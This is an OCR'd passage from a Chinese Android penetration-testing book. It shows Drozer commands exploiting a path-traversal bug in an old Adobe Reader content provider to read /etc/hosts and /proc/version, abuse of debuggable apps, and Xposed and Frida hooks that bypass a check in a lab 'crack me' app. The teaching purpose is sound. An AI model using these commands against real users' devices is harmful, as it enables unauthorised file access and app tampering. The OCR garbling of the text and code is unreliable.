vulnerability-onadobe-reader-android-application/。 




















根据 这 份 原始 报告 ， 所 有 版 本 号 低 于 10.3.1 的 Adobe Reader 都 存在 这 种 攻击 漏洞 。 





本 例 使 用 Adobe 10.3.1， 包 名 是 com.adobe.reader。 








使 用 aba 安 装 应 用 ， 如 下 所 示 。 








$ adb install Adobe_Reader_10.3.1.apk 
1453 KB/s (6165978 bytes in 4.143s) 

pkg: /data/local/tmp/Adobe_Reader_10.3.1.apk 
Success 


$ 
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安装 完成 后 ， 我 们 在 设备 上 可 以 看 到 Adobe Reader 应 用 图 标 ， 如 下 图 所 示 。 


WIDGETS 


人 B 


Adobe Reader API Demos 


Calculator Calendar 














与 之 前 的 方法 类 似 ， 我 们 通过 下 面 的 命令 查找 包 名 。 














dz> run app.package.list -f adobe 
com.adobe.reader (Adobe Reader) 
dz> 


查看 应 用 的 攻击 面 。 


dz> run app.package.attacksurface com.adobe.reader 
Attack Surface: 

1 activities exported 

0 broadcast receivers exported 

1 content providers exported 

0 services exported 























有 趣 的 是 ， 有 一 个 内 容 提供 程序 是 导出 的 。 下 一 步 是 找 出 这 个 内 容 提供 程序 的 URI。 可 以 使 
用 scanner.provider.finduris 模 块 完成 。 


dz> run scanner.provider.finduris -a com.adobe.reader 
Scanning com.adobe.reader... 

Unable to Query content://com.adobe.reader.fileprovider/ 
Unable to Query content://com.adobe.reader.fileprovider 





No accessible content URIs found. 
dz> 


E 意 ，Drozer 提 示 没 有 找到 可 访问 的 内 容 URI。 这 一 点 也 不 意外 ， 因 为 它 aR 
数据 ， 而 提供 程序 是 基于 文件 的 。 我 们 来 检查 应 用 是 否 存在 遍历 漏洞 ， 可 以 使 用 下 面 的 命令 进 
查找 。 


dz> run scanner.provider.traversal -a com.adobe.reader 


运行 上 述 命令 ， 会 显示 如 下 结果 。 
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在 类 


dz> run scanner.provider.traversal -a com.adobe.reader 
Scanning com.adobe.reader... 
Not Vulnerable: 

No non-vulnerable URIs found. 


Vulnerable Providers: 
content ://com.adobe.reader.fileprovider/ 
content ://com.adobe.reader.fileprovider 
dz> 


从 上 面 的 代码 中 可 以 看 出 ， 应 用 中 有 一 个 内 容 提供 t 程 序 URI 存 在 目录 遍历 漏洞 。 攻 击 者 可 以 
个 漏洞 读 取 设 备 中 的 任意 文件 ， 下 一 节 将 介绍 这 部 分 内 容 。 


1. 读 取 /etc/hosts 


hosts 文 件 包含 数 行文 本 , 每 行文 本 开头 部 分 是 一 个 下 地 址 , IP 地 址 后 面 有 一 个 或 多 个 主机 名 。 
UNIX 机 器 中 ，hosts 文 件 存放 在 /etc/hosts 路 径 下 。 下 面 介绍 攻击 者 如 何 通过 有 漏洞 的 应 用 读 








取 hosts 文 件 。 








dz> run app.provider.read content://com.adobe.reader. 
fileprovider/../../../../etc/hosts 
127.0.0.1 localhost 


dz> 


2. 读 取 内 核 版 本 


/proc/version 文 件 包含 设备 的 Linux 内 核 详细 版 本 信息 ， 以 及 编译 内 核 的 GCC 编 译 器 的 版 本 
下 面 介绍 攻击 者 如 何 利 用 有 漏洞 的 应 用 读 取 该 文件 。 




















dz> run app.provider.read content://com.adobe.reader. 
fileprovider/../../../../proc/version 

Linux version 3.4.0-gd853d22 (nnk@nnk.mtv.corp.google.com) (gcc version 
4.6.x-google 20120106 (prerelease) (GCC) ) #1 PREEMPT Tue Jul 9 17:46:46 
PDT 2013 


dz> 


面 命令 中 “. ./” 的 数量 需要 通过 试 错 法 才能 找到 。 如 果 拥 有 访问 源 代 码 的 权限 ， 也 可 以 

















Pee ene o 





8.1.13 ”利用 可 调试 的 应 用 


在 安 卓 应 用 的 AndroidManifest.xml 文 件 中 ,， 有 一 个 名 为 android:debuggable 的 标志 。 在 应 








用 开发 阶段 , 它 被 设置 为 Lrue; 而 在 发 布 时 ,， 它 被 默认 设置 为 false。 这 个 标志 主要 是 在 开发 阶 
段 调 试 时 使 用 , 不 建议 在 生产 阶段 把 它 设 为 true。 如 果 开 发 人 员 显 式 地 将 aebuggable 标 志 设 为 
true， 就 会 造成 漏洞 。 如 果 应 用 在 虚拟 机 中 运行 时 是 可 调试 的 ， 那么 它 会 暴露 一 个 特殊 的 端口 。 
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我 们 可 以 通过 JDB 工 具 连 接 这 个 端口 。 这 在 支持 JDWP 协 议 的 Dalvik 虚 拟 机 中 是 可 能 发 生 的 。 拥 有 
设备 物理 访问 权限 的 攻击 者 通过 暴露 的 UNIX 套 接 字 连接 应 用 , 并 在 目标 应 用 中 运行 任意 的 代码 ， 
这 也 是 可 能 发 生 的 。 


本 节 将 介绍 利用 可 调试 应 用 的 最 简单 的 方法 ， 下 面 的 命令 会 列 出 所 有 可 连接 调试 的 PID。 























adb jdwp 


为 了 找 出 目标 应 用 的 PID ， 在 运行 上 述 命令 之 前 ， 需 要 确保 目标 应 用 未 运行 ， 如 下 图 所 示 。 








srini's MacBook:~ srini@x@@$ adb jdwp 
419 

471 

499 

556 

573 

584 

609 

620 

745 

765 

780 

794 

812 

836 

857 

883 

srini's MacBook:~ sriniðxðð$ | 














然后 ,启动 应 用 ,再 一 次 运行 之 前 的 命令 。 这 样 做 是 为 了 使 应 用 进入 到 激活 状态 ， 因 为 只 有 
当 应 用 被 激活 时 ， 才 能 查看 它 的 PID。 启 动 应 用 后 ， 运 行 前 面 的 命令 会 多 显示 一 个 PID， 如 下 图 
所 示 。 








srini's MacBook:~ srini®@x@@$ adb jdwp 
419 
471 
499 
556 
573 
584 
609 
620 
745 
765 
780 
794 
812 
836 
857 
883 
903 
920 
940 
1011 
1062 
srini's MacBook:~ srini®@x0e$ | 


虽然 列 出 一 些 其 他 多 余 的 端口 ， 我 们 可 以 使 用 ps 命令 找 出 目标 应 用 ， 如 下 图 所 示 。 

















srini's MacBook:~ srini@x@@$ adb shell ps | grep '1062' 
u@_a78 1062 58 196728 20576 ffffffff b6f385cc S com.androidpentesting.hackingandroidvulnapp1 
srini's MacBook:~ srini@x@e$ 
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从 上 面 的 输出 中 可 以 看 出 ，1062 就 是 目标 应 用 的 PID。 我 们 还 能 看 到 这 个 应 用 的 包 名 。 记 录 
包 名 ， 因 为 后 面 会 用 到 它 。 


在 讨论 如 何 通过 aebuggapble 标 志 利 用 应 用 之 前 ， 我 们 先 看 一 下 如 何在 没有 root 权 限 的 情况 
下 访问 应 用 的 特定 数据 。 





srini's MacBook:~ sriniox009$ adb -d shell 

shell@android:/ $ cd /data/data/com.androidpentesting.hackingandroidvulnapp1 
shell@android: /data/data/com.androidpentesting.hackingandroidvulnapp1 $ ls 
opendir failed, Permission denied 

255 |shell@android: /data/data/com.androidpentesting.hackingandroidvulnapp1 $ | 


正如 你 所 看 到 的 ， 当 我 们 尝试 列 出 应 用 私有 文件 夹 下 的 文件 和 文件 夹 时 ， 得 到 了 一 个 


Permission denied 错 误 。 


现在 ， 再 获取 一 个 shell 并 使 用 run-as 二 进 制 文件 ， 如 下 图 所 示 。 
































srini's MacBook:~ srini@x@@$ adb -d shell 

shell@android:/ $ run-as com.androidpentesting.hackingandroidvulnapp1 
shell@android: /data/data/com.androidpentesting.hackingandroidvulnapp1 $ ls 
cache 

lib 

shell@android: /data/data/com.androidpentesting.hackingandroidvulnapp1 $ | 


注意 ， 观 察 上 面 的 输出 ， 我 们 可 以 看 到 这 个 有 漏洞 的 应 用 的 私有 文件 。 














8.2 Cydia Substrate 简介 


Cydia Substrate 是 一 款 可 以 在 ROOT 过 的 设备 上 使 用 的 工具 , 能 够 通过 注入 应 用 进程 在 运行 时 
hook 和 修改 安 卓 应 用 。 它 原名 是 Mobile Substrate， 最 初 是 面向 iOS 设 备 的 。Cydia Substrate 是 大 多 
数 可 用 的 运行 时 操纵 工具 的 基础 。 我 们 可 以 开发 通过 Cydia Substrate 工 作 的 第 三 方 插件 ， 这 些 被 
称 为 扩展 程序 。 下 一 部 分 将 介绍 Introspy 工 具 ， 它 是 一 个 流行 的 用 于 安 卓 应 用 运行 时 监控 和 分 析 
的 Cydia Substrate 扩 展 。 可 以 从 谷歌 Play 商店 下 载 Cydia Substrate， 你 也 可 以 从 下 面 的 链接 下 载 并 
安装 它 : https://play.google.com/store/apps/details?id=com.saurik.substrate。 












































Cydia Substrate 
CR SaurikIT LLC 


Unrated 


INSTALL 


SOOO 


Downloads 6897.2 Personalisation Similar 





187 
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安装 完成 后 ， 启 动 Cydia Substrate， 会 出 现 如 下 图 所 示 的 主 界面 。 
+ JfH OBR ™ 08:12 
re Substrate 
Link Substrate Files 
点 击 Link Substrate Files 按 钮 ， 可 以 查看 如 下 图 所 示 的 activity。 
+ Ae OV oi 0915 

个 Substrate 

Unlink Substrate Files 

Restart System (Soft) 
Contribute via PayPal 
日 户 重 启 设 备 才 能 使 用 它 。 


























roa 
一 


次 安装 Cydia Substrate 会 显示 上 面 的 信息 ， 要 求 月 
8.3 使 用 Introspy 进行 运行 时 监控 与 分 析 
多 1 章 介绍 了 如 何 安装 Introspy。 本 节 将 讨论 如 何 使 用 Introspy 对 安 章 应 用 进行 运行 时 监控 和 分 
FCydia Substrate 的 扩展 , 因此 ,要 运行 Introspy 就 必须 先 安装 Cydia Substrate. 





yÈ 














第 
是 一 个 基于 
Introspy 会 监控 应 用 的 每 一 个 活动 ， 如 调用 数据 存储 、intent 等 





析 。 Introspy 


188 第 8 章 客户 端 攻击 一 动态 分 析 技 术 











下 面 是 Introspy 的 使 用 步骤: 
(1) 在 设备 上 启动 Introspy 应 用 ; 
(2) 选择 目标 应 用 ; 


(3) 运行 并 浏览 目标 应 用 ; 








(4) 观察 aaqb 日 志 (ak) 生成 HTML 报 告 。 








在 hook 和 分 析 目 标 应 用 之 前 , 检查 目标 应 用 databases 文 件 夹 , 确认 里 面 没有 Introspy 的 数据 库 
文件 。 


下 面 是 我 使 用 的 whatsapplock 应 用 databases 文 件 夹 中 的 条 目 。 





root@android:/data/data/com.whatsapplock # cd databases 
root@android:/data/data/com.whatsapplock/datahases # ls 
im.db 

inm.db-—journal 

ltvp.db 

ltvp.db-journal 





root@android:/data/data/com.whatsapplock/datahbases # 


从 上 图 中 可 以 看 出 ， 没 有 Introspy 文 件 。 


接 下 来 ,在 设备 上 启动 Introspy 应 用 ， 并 选择 目标 应 用 。 这 里 我 选择 whatsapplock 应 用 ， 如 下 
图 所 示 。 























[TrackID™] 


com.sonyericsson.trackid 


[Tinder] 
com.tinder 


[ChatLock+] 
com.whatsapplock 


[NeoReader] 
de.gavitec.semc 


[Diva] 
jakhar.aseem.diva SSL 


[Whisper] WEBVIE 
sh.whisper W 
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并 调用 应 用 所 有 的 功能 。 

















运行 whatsappchatlock 应 用 ， 浏 览 整 个 应 用 


Ole rae 


Enter your PIN 








Introspy 会 对 其 进行 监控 ,并 将 所 监控 到 的 调用 保存 到 目标 应 用 databases 文 件 夹 下 的 一 个 数据 
库 文件 中 。 

进入 whatsappchatlock 应 用 的 databases 文 件 夹 ， 我 们 会 看 到 一 个 新 的 名 为 introspy.db 的 数据 库 
文件 ， 如 下 所 示 。 














root@android:/data/data/com.whatsapplock/databases # ls 
in. 

in.db-journal 

introspy.db 

introspy.db—journal 

Itup.db 

ltvp.db-—journal 

webview.db 

webview.db—journal 

webyv iewCookiesChromium.db 

webu iewCookiesChr onium. db- journal 





ch: 
root@android:/data/data/com.whatsapplock/databases # 





我 们 可 以 深入 分 析 introspy.db 文 件 ， 并 生成 一 份 报 告 。 为 此 ， 我 们 需要 把 这 个 文件 复制 到 SD 
卡 中 ,便于 后 面 将 其 拉 取 到 计算 机 上 。 可 以 使 用 下 面 的 命令 来 完成 此 操作 。 








cp introspy.db /mnt/sdcard 
现在 ， 使 用 下 面 的 命令 将 introspy.db 文 件 拉 取 到 计算 机 上 ， 如 下 所 示 。 8 


master>adh pull /mnt/sdcard/introspy.db 
1719 KB/s (466944 bytes in @.265s> 











在 计算 机 上 Introspy 的 目录 中 ， 运 行 下 面 的 命令 来 设置 生成 报告 的 环境 。 


python setup.py install 


最 后 ， 运 行 下 面 的 命令 即 可 生成 报告 


master>python -m introspy -p android -o output introspy.db 
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口 -p: 用 于 指定 平台 So 
O -o: 指定 输出 目录 。 
OU introspy.db: 它 是 我 们 从 设备 中 得 到 的 输入 文件 。 


如 果 上 面 的 命令 运行 成 功 ， 就 会 新 建 一 个 output 文 件 夹 ， 如 下 图 所 示 。 











J build 
j dist 


J introspy 
i Introspy_Analyzer.egg-info 
|. output 


LJ gitignore 








|| introspy 

|_] LICENSE 

L MANIFEST.in 
[7] README 

œ setup 











个 output 文 件 夹 包含 报告 所 需 的 所 有 文件 ， 如 下 图 所 示 。 





i bootstrap 
图 apiGroups 
findings 
图 handlebars 
{| introspy 
图 jquery.min 
(| report 
图 tracedCalls 











使 用 浏览 器 打开 这 个 文件 夹 中 的 report.html 文 件 来 查看 报告 ， 报 告 如 下 图 所 示 。 


© Show / Hide Show All Hide All inc bY Misc | v Storage ~ Crypto | ~ 





422: android.app.SharedPreferencesimpl getLong 


Arguments. 


{ 
"Preference Name": “TimeLastUnlock" 


} 


Return Value: 


"1453879050932" 


423: android.app.SharedPreferencesimpl getString 


424: javax.crypto_Cipher doFinal - [WARNING :-&gt; Algo: RSA/ECB/nopadding - !!! ECB used. ECB mode is broken and 
should not be used.] 


425: android. app.SharedPreferencesimp! getint 





Arguments: 


{ 


“Preference Name": “WhatsLock” 


} 


Return Value: 


"o" 
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从 上 图 中 可 以 看 出 ，Introspy 追 踪 到 应 用 调用 了 一 次 SsharedPreferences。 


© Show / Hide Show All Hide All Ipc | Y Misc *¥ Storage 7 Crypto | 7 





117: java.io.FileOutputStream FileOutputStream 





Arguments: 


"Path": "[/data/data/com.whatsapplock/shared_prefs/whatsLock.xml]" 


} 











上 图 显示 了 Introspy 在 应 用 打开 whatslock.xml 文 件 时 追踪 到 了 一 次 调用 。 


© Show / Hide Show All Hide All Ipc | 荆 Misc | 7 Storage | 7 Crypto | 7 





should not be used.] 
760: android.content.ContextWrapper startActivity 


Arguments: 


"Intent": “Intent { act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0x34000000 
y 
} 


Return Value: 











上 图 显示 Introspy 追 踪 到 应 用 启动 时 触发 了 一 个 Intent。 


8.4 使 用 Xposed 框架 进行 hook 


Xposed 是 一 个 允许 开发 者 通过 编写 自 定义 模块 hook 安 卓 应 用 以 便 在 运行 时 修改 应 用 流程 的 
框架 。Xposed 框 架 由 rovo89 于 2012 年 发 布 。 它 的 工作 原理 是 ， 使 用 app eee 制 文件 来 替换 
/systemy/bin/ 目 录 下 原 有 的 app_process 文 件 。app_process 二 进 制 文件 可 以 启动 Zygote 进 程 。 基 本 上 ， 
当 安 卓 手机 启动 后 ，init 会 运行 /systemy/bin/app_process， 并 创建 Zygote 进 程 。 使 用 Xposed 框 架 ， 
我 们 可 以 hook 任 意 从 Zygote 进 程 fork 出 来 的 进程 。 


为 了 演示 Xposed 框 架 的 功能 ， 我 创建 了 一 个 有 漏洞 的 应 用 。 
这 个 有 漏洞 的 应 用 的 包 名 是 com.androidpentesting.hackingandroidvulnapp1。 
下 面 的 代码 展示 了 这 个 有 漏洞 的 应 用 的 运行 原理 。 
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} 


tt 





public class MainActivity extends Activity { 
Button btn; 
TextView tv; 
int i=0; 


@0verride 
protected void onCreate(Bundle savedInstanceState) { 


void setOutput(int i){ 


super. onCreate(savedInstanceState) ; 
setContentView(R. layout.activity_main); 


btn = (Button) findViewById(R. id. btnSubmit) ; 
tv = (TextView) findViewById(R. id. tvOutput) ; 


btn.setOnClickListener(new View.OnClickListener() { 
G0verride 
public void onClick(View v) { 
setOutput (i); 


H; 


if(i==1) 
{ 
Toast.makeText (getApplicationContext(),"Cracked",Toast.LENGTH_LONG) .show(); 


else 
{ 


Toast.makeText(getApplicationContext(),"You cant crack it",Toast.LENGTH_LONG) .show(); 








上 图 中 的 代码 有 一 


个 setoutput 方 法 。 点 击 按钮 时 ， 会 调用 这 个 方法 。 当 setoutput 被 调 

















用 时 ， 变 量 i 的 值 会 作为 参数 传 给 它 。 注 意 ，i 的 初始 值 是 9。 在 setoutput 函 数 内 部 ， 会 检查 i 
的 值 是 否 为 1。 如 果 i 的 值 为 1， 应 用 会 显示 Cracked 提 示 。 但 是 ， 由 于 初始 值 是 0， 
HEZ “You can’t crack it” 的 提示 。 


在 模拟 妖 中 运行 这 个 应 用 ， 效 果 如 下 图 所 示 。 














Crack Me 


You cant crack it 








现在 , 我 们 的 目标 是 





Cracked 提 示 。 














编写 一 个 Xposed 模 块 , 用 于 在 运行 时 修改 应 用 的 功能 





这 个 应 用 会 一 


， 从 而 让 应 用 显示 


首先 ， 在 模拟 器 中 ， 下 载 并 安装 Xposed APK 文 件 。 可 以 从 下 面 的 链接 下 载 Xposed : 
http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk. 
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使 用 下 面 的 命令 安装 下 载 的 APK 文 件 。 
adb install [文件 名 ] .apk 


安装 完成 后 ， 启 动 应 用 ， 会 看 到 如 下 图 所 示 的 界面 。 








= 
aig) Xposed Installer 





Welcome to the Xposed Installer! 
Please choose what you want to do: 


Framework 
Here you can manage the Xposed framework, which is required for any modules to work. 


Modules 
The framework itself doesn't add any functionality. You need modules for that. In this section you can activate modules after you have installed 
them. 


Download 


This section gives you access to a repository of modules, so you can search and download the ones you like and keep them up to date 


Settings 


Go to this section to configure the Xposed Installer and framework 


Logs 


Display and save/send logs of the Xposed framework 


About 


Learn about the people who created Xposed, where to get support for this app etc. 























到 这 一 步 ， 确 定 你 已 经 设置 好 了 一 切 ， 然 后 再 继续 。 完 成 设置 后 ， 进 入 Modules 标 签 ， 查 看 
所 有 已 安装 的 Xposed 模 块 。 b 任何 重庆。 























No Xposed modules were found! 














我 们 将 创建 一 个 新 模块 ， 从 而 使 目标 应 用 显示 Cracked 提 示 。 我 们 使 用 Android Studio 来 创建 
这 个 自 定义 模块 。 
为 了 简化 流程 ， 按 照 下 面 的 步骤 操作 。 


(1) 首先 ,在 Android Studio 中 选择 Add No Actvity 选 项 ， 并 创建 一 个 新 工程 ， 如 下 图 所 示 。 我 
将 其 命名 为 XposedModule。 
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Add an activity to Mobile 


Add No Activity 











8 


Googe Maps Activity 











(2) 添加 XposedBridgeAPI 库 ， 这 样 我 们 就 能 在 这 个 模块 中 使 用 Xposed 的 特定 方法 。 可 以 从 下 
面 的 链接 下 载 这 个 库 : http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d = 


1400342298, 


(3) 在 app 目 录 中 新 建 一 个 provided 文 件 夹 ， 并 将 这 个 库 放 到 provided 目 录 下 。 
(4) 现在 ， 在 app/src/main/ 目 录 中 新 建 一 个 名 为 assets 文 件 来， 并 新 建 一 个 新 文件 xposed_init。 


在 后 面 的 步 又 中 ， 我 们 会 在 这 个 文件 中 添加 内 容 。 
前 四 步 完 成 后 ， 我 们 的 工程 目录 如 下 图 所 示 。 





lo 


3 XposedModule 


日 ] Project © + | He fr 
v [3XposedModule (~/AndroidStudioProjects/XposedModule) 


> D.idea 
v Clapp 
> build 
libs 
v E provided 
> lÈ] XposedBridgeApi-54.jar 
v src 
>» 站 androidTest 
v D main 
v Caassets 
B xposed_init 
> java 
> Cares 
E AndroidManifest.xml 
E .gitignore 
引 app.iml 
> build.gradle 
B proguard-rules.pro 
© build 
© gradle 
E) .gitignore 
© build.gradle 
{uli gradle.properties 
目 gradlew 
| gradlew.bat 
(ai local.properties 
© settings.gradle 
引 XposedModule.iml 
> hy External Libraries 


1# 1: Project 


呵 Z: Structure 


vv 


Build Variants 

















J 2: Favorites 
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(1) 打开 app 文 件 夹 中 的 build.gradle 文 件 ， 并 将 下 面 的 代码 添加 到 dependencies 中 。 
provided files('provided/[file name of the Xposed library.jar]') 


在 本 例 中 ， 添 加 后 的 代码 如 下 图 所 示 。 





dependencies { 
compile fileTree(dir: 'libs', include: ['*.jar']) 
compile 'com.android.support:appcompat-v7:21.0.3' 














(2) 创建 一 个 名 为 XposedClass 的 新 类 ， 如 下 图 所 示 。 














ece Create New Class 
Name: |XposedClass TL 
Kind: © Class 














新 的 类 创建 完成 后 ， 工 程 的 结构 应 该 如 下 图 所 示 。 























E3 XposedModule Japp) © src > © main > M java > © com > 四 androidpentesting =) xposedmodule > c XposedClass > 
Ci Android z| O $|% Ir © AndroidManifest.xml x C) XposedClass.java x 
i v Caapp package com.androidpentesting. xposedmodule; 
+ > © manifests 
v j Of 
Dijava n i * Created by srini@x@@ on 26/01/16. 
了 E\com.androidpentesting.xposedmodule a */ ‘ere 
= © % XposedClass public class XposedClass { 
5 >» [©)com.androidpentesting.xposedmodule (androidTest) 
a > Cares } 
Ñ ~ 
> O 
v Gradle Scripts 











(3) 打开 之 前 创建 的 xposed_init 文 件 ， 并 将 下 面 的 内 容 粘贴 到 里 面 。 
com.androidpentesting.xposedmodule.XposedClass 


如 下 图 所 示 。 








| 后 Project z| © = | #- i+ | E xposed_init x 
|v E2XposedModule (~/AndroidStudioProjects /XposedModule) com. androidpentesting. xposedmodule. XposedC lass 
> 站 .idea 
v 四 app 
> E build 
D libs 
> provided 
v Gsrc 
> D androidTest 
v O main 
v Caassets 
El xposed_init 
> java 
> Cares 
Eè AndroidManifest.xml 


E3 XposedModule Clapp ) O sre o main E3 assets | E| xposed_init > 














1# 1: Project 


«J 2: Structure 
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(4) 将 下 面 的 内 容 添 加 到 AndroidManifestxml 文 件 中 ， 从 而 可 以 提供 一 些 关于 模块 的 信 ， 


<meta-data 
android:name="xposedmodule" 
android:value="true" /> 


<meta-data 
android:name="xposeddescription" 
android: value="xposed module to bypass the validation" /> 


<meta-data 


android:name="xposedminversion" 
android:value="54" /> 


务必 将 前 面 的 内 容 添 加 到 application 部 分 ， 如 下 图 所 示 。 


<manifest xmlns:android="http: //schemas.android.com/apk/res/android" 











package="com j.xposedmodule"> 





<application android:allowBackup="true" android: label="XposedModule” 
android: icon="@drawable/ic_Launcher" android: theme="@style/AppTheme"> 


<meta-data 

android :name="xposedmodule” 

android: value="true" /> 
<meta-data 

android: name="xposeddescription” 

android: value=" d module to bypass the validation" /> 
<meta-—data 

android: name="xposedminversion" 

android: value="54" /> 








= </application> 


</manifest> 




















(5) 最 后 ， 在 XposedClass 中 编写 代码 ， 并 添加 hook。 
下 面 是 实际 绕 过 目标 应 用 验证 的 一 段 代码 。 














package com.androidpentesting.xposedmodule; 

import de.robv.android.xposed.IXposedHookLoadPackage; 

import de.robv.android,.xposed.XC_MethodHook; 

import de.robv.android.xposed.XposedBridge; 

import de. robv.android. xposed. callbacks.XC_LoadPackage. LoadPackageParam; 
import static de. robv. android. xposed. XposedHelpers. findAndHookMethod; 
public class XposedClass implements IXposedHookLoadPackage { 


public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable { 






String classToHook = "cor 
String functionToHook = 


idvulnapp1.MainActivity"; 






etOutpu 
if (lpparam. packageName. equals ( "com. sppl")) { 
XposedBridge. log("Loaded app: " + lpparam. packageName) 
findAndHookMethod(classToHook, lpparam.classLoader, functionToHook, int.class, 
new XC_MethodHook() { 
@0verride 
protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 
param.args[0] = 1; 


XposedBridge. log("value of i after hooking" + param.args[0]); 


H; 








息 。 
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在 这 段 代 码 中 ， 我 们 做 了 如 下 工作 : 


口 首先 ， 这 个 类 继承 了 IXposedHookLoadPackage; 

口 我 们 实现 了 handleLoadPackage 方 法 ,继承 自 IXposedHookLoadPackage 的 类 必须 实 
现 这 个 方法 ; 

口 赋予 classToHook 和 functionToHook 字 符 串 值 ; 

口 编写 一 个 if 条 件 语句 来 检查 包 名 是 否 与 目标 应 用 包 名 一 致 ; 

口 如 果 包 名 一 致 ， 执 行 beforeHookedMethod 中 的 自 定 义 代码 ; 


O 在 beforeHookedMethod 中 , 我 们 将 i 的 值 设 为 1。 这 样 ， 当 点 击 按钮 时 , 由 于 i 的 值 为 1， 
会 弹出 Cracked 的 消息 提示 。 















































与 其 他 应 用 类 似 ， 编 译 并 运行 这 个 应 用 ， 然 后 检查 Xposed 应 用 的 Modules 选 项 。 你 应 该 会 看 
到 一 个 名 为 XposedModule 的 新 模块 ， 如 下 图 所 示 。 


XposedModule 
ye 


y example which makes the status bar clock red and adds a smiley 




















选中 上 图 中 的 模块 ， 然 后 重启 模拟 需 。 





模拟 需 重 启 后 ， 运 行 目 标 应 用 ， 然 后 点 击 Crack Me 按钮 。 





Crack Me 





从 上 图 中 可 以 看 到 ， 在 不 修改 原始 代码 的 情况 下 ， 我 们 在 运行 时 修改 了 应 用 的 功能 。 
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点 击 Logs 选 项 ， 还 能 看 到 日 志 信息 。 


你 可 以 在 源 代码 查看 XposedBridge.1og 方 法 ， 这 个 方法 用 于 记录 下 图 中 的 信息 。 








Loaded app: com.androidpentesting.hackingandroidvulnapp1 
value of i after hooking! 





8.5 使 用 Frida 进行 动态 插 桩 


本 闻 将 介绍 如 何 使 用 Frida 工 具 ， 它 可 以 对 安 卓 应 用 进行 动态 搬 桩 。 











Frida 是 什么 
Frida 是 一 个 开源 的 动态 插 桩 工具 , 它 能 让 逆向 工程 师 和 程序 员 调试 运行 中 的 进程 。 它 使 用 了 
“客户 端 - 服 务 端 ” 模 型 ， 并 利用 Frida 内 核 和 谷歌 v8 引 擎 hook 进 程 。 


不 同 于 Xposed 框 架 , 它 使 用 方便 , 既 不 需要 额外 的 编程 , 也 不 需要 重启 设备 。Frida 支 持 安 卓 、 
iOS、Linux、Mac、Windows 以 及 强大 的 API 接 口 等 , 它 是 在 渗透 测试 中 创建 逆向 工程 最 好 用 的 工 
具 之 一 。 当 前 Frida 的 API 绑 定 了 Python 、node.js 和 .NET， 如 果 有 需要 ， 你 也 可 以 绑 定 其 他 语言 。 


1. 必 备 条 件 
如 第 1 章 所 述 ， 需 要 满足 下 面 的 条 件 才 能 使 用 Frida 对 应 用 进行 测试 。 


O 一 部 ROOT 过 的 安 旨 手机 或 者 模拟 器 ; 

O 安 卓 设备 上 安装 了 Frida 服 务 器 应 用 ; 

口 计算 机 上 安装 了 Frida 客 户 端 应 用 ; 

口 使 用 frida-ps -R 命 令 可 以 查看 进程 列表 。 


为 了 演示 Frida 的 功能 ， 我 们 对 之 前 在 Xposed 框 架 中 使 用 过 的 应 用 进行 简单 修改 ， 并 使 用 修改 后 
的 版 本 进行 演示 ， 但 这 个 有 漏洞 的 应 用 的 包 名 仍然 是 com.androidpentesting.hackingandroidvulnapp1 。 


修改 后 的 代码 如 下 图 所 示 。 
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14) public class MainActivity extends Activity { 

15 

16 Button btn; TextView tv; int i=0; boolean success; 

17 

18 goverride 

19 of protected void onCreate (Bundle savedInstanceState) { 

20 super.onCreate (savedInstanceState) ; 

21 setContentView(R. layout .activity_main) ; 

22 

23 btn = (Button) findViewById(R.id.btnsubmit) ; 

24 tv = (TextView) findViewById(R.id.tvoutput) ; 

25 

26 btn.setOnClickListener (new View.OnClickListener() { 
27 @override 

28 of public void onClick(View v) { 

29 Log.i("VALUE", "Value is "+i); 

30 success=setOutput (i); 

31 if (success) { 

32 Toast .makeText (getApplicationContext (), "Cracked", Toast. LENGTH_LONG) . show () ; 
33 Log. i("VALUE", "Value in if is "+i); 

34 } 

35 else{ 

36 Toast .makeText (getApplicationContext (), "Can't 中 ack it", Toast. LENGTH_LONG) . show () ; 
37 Log. i ("VALUE", "Value in else case is "+i); 
38 } 

39 } 

40 D: 

41 } 

42 

43 boolean setoutput (int i) { 

44 if (i==1) 

45 return true; 

46 else 

47 return false; 

48 } 

49 } 





上 面 的 代码 包含 一 个 修改 后 ae 它 只 返回 true 或 false。 当 调用 setoutput 时 ， 
i 的 值 被 初始 化 为 0， 并 传递 给 这 个 方法 。 如 果 i 的 值 被 设 为 1， 应 用 会 显示 Cracked 提 示 。 但 是 ， 
由 于 初始 值 为 0， 应 用 会 ere “Cant crack it” o 


接 下 来 ， 我 们 使 用 Frida 让 应 用 在 activity 上 显示 Cracked 提 示 ， 但 是 ， 我 们 不 会 像 在 Xposed 框 
架 中 那样 编写 代码 ,Frida 本 质 上 是 一 个 动态 插 桩 工具 ,可 以 在 编码 量 最 小 的 情况 下 解决 这 种 问题 。 


应 用 并 启动 它 ， 你 会 看 到 我 们 之 前 见 过 的 熟悉 界面 。 


Frida 具 有 很 多 特性 和 功能 ， E 修改 函数 参数 、 发 送 消 息 、 接 收 消息 等 。 所 有 这 
些 内 容 需 要 一 整 章 才 能 介绍 完 ， 我 们 在 此 只 介绍 一 些 足够 你 学 习 Frida 更 高 级 主题 的 内 容 。 


我 们 来 看 一 个 修改 setoutput 实 现 的 例子 ,使 其 忽略 变量 i 的 值 ， 永 远 返 回 true。 
2. 使 用 Frida 进 行动 态 hook 的 步 又 

我 们 需要 按照 下 面 的 步骤 来 修改 setouput 方 法 : 

(1) 使 用 附加 的 API 将 Frida 客 户 端 绑 定 应 用 进 和 
(2) 找 出 包含 你 要 分 析 或 修改 的 方法 所 在 的 类 
(3) 找 出 你 要 hook 的 API 或 方法 ; 

(4) 创建 Javascript 脚 本 ， 调 用 create_script 将 脚本 推送 到 进程 ; 
(5) 使 用 script .1oad 方 法 将 Javascript 代 码 推送 到 进程 ; 
































HH 
we 








Q 
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(6) 触发 代码 ， 并 查看 结 
运行 下 面 的 代码 连接 进程 。 


session = frida.get_remote_device().attach("com.androidpentesting. 
hackingandroidvulnapp1") 


接 下 来 ,我 们 需要 找 出 目标 类 。 本 例 中 只 有 一 个 类 ， 即 MainActivity， 我 们 要 尝试 hook 的 
函数 是 setoutput。 可 以 通过 下 面 这 段 代 码 完 成 这 一 步 。 
Java.perform(function () { 
var Activity = 
Java.use("com.androidpentesting.hackingandroidvulnappl.MainActivity"); 
Activity.setOutput.implementation = function () { 


send("setOutput() got called! Let's always return true"); 
return true; 
i 
4 


